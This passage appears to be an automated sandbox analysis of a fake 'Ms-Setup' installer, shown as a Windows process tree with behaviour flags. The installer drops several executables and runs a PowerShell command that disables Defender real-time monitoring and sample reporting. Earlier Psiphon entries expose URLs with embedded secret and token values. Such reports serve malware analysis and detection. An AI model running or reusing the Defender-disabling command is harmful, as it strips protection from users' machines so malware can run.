                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:1920
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:2004
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:844
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToxOToyMi4yNTVaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:832
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:832 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1124
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1452
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToxOTo1NC44NDVaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:904
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:904 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:528
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=banner&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToyMDoxMi42MDlaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:1260
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1260 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1488
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:548
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOToyMTo0Ny4xMDBaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:1116
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1116 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1324
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1076
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOTozMjoxNS40MjVaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:936
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1148
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:788
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOTozNDoyMi42NThaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:608
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:608 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1592
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://s3.amazonaws.com/psiphon/web/mjr4-p23r-puwl/index.html
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer Phishing Filter
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    PID:1316
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1316 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1916
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\34ZL0Q4Z\psiphon3.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\34ZL0Q4Z\psiphon3.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2000
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=banner&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOTozNTozMi42NzlaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:1064
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      PID:1060
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:992
                                                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=US&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiVVMiLCJjbGllbnRfdmVyc2lvbiI6IjE3MSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyMi0wMS0yOFQxOTozNjozMS42MDZaIiwidG9rZW5zIjoidG9rZW5fdHJhY2tlcl9lYXJuZXJfMDIzNTk2MmEwNWU4YjJmZGI3YWQ1MmRiOWI0OTBhZGY5MGMzZDEyYmJkYjRiMDUwMTc0ZDM3OWFmNWU1NTZiMiIsInYiOjF9
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:1568
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1512
                                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275502 /prefetch:2
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                        PID:2252
                                                                                                                                                                                  • C:\Windows\system32\verclsid.exe
                                                                                                                                                                                    "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2000
                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x4f8
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:836
                                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1100
                                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1100 CREDAT:275457 /prefetch:2
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:1540
                                                                                                                                                                                    • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\psiphon3\" -spe -an -ai#7zMap27043:96:7zEvent27682
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:1176
                                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:848
                                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:1612
                                                                                                                                                                                    • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\61F44468D6517-Ms-Setup-864x\" -spe -an -ai#7zMap3023:116:7zEvent2241
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:2528
                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x508
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:2600
                                                                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\61F44468D6517-Ms-Setup-864x\PASSWORD-IS-UFIC46V6.txt
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2684
                                                                                                                                                                                      • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\61F44468D6517-Ms-Setup-864x\app-setup-i864\" -spe -an -ai#7zMap23697:146:7zEvent1287
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:2756
                                                                                                                                                                                      • C:\Users\Admin\Downloads\61F44468D6517-Ms-Setup-864x\app-setup-i864\win-setup-i864.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\61F44468D6517-Ms-Setup-864x\app-setup-i864\win-setup-i864.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:2860
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:2892
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\setup_install.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\setup_install.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:2948
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3008
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2204
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c 61f4443a00449_Fri19f3260f3.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3016
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c 61f4443a88b5d_Fri19a3fc9387.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3024
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c 61f4443b6003a_Fri19d5bc2b.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4443b6003a_Fri19d5bc2b.exe
                                                                                                                                                                                                      61f4443b6003a_Fri19d5bc2b.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:2396
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4443b6003a_Fri19d5bc2b.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4443b6003a_Fri19d5bc2b.exe
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2428
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c 61f4443c9fbcd_Fri194fb3d4f.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:3040
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4443c9fbcd_Fri194fb3d4f.exe
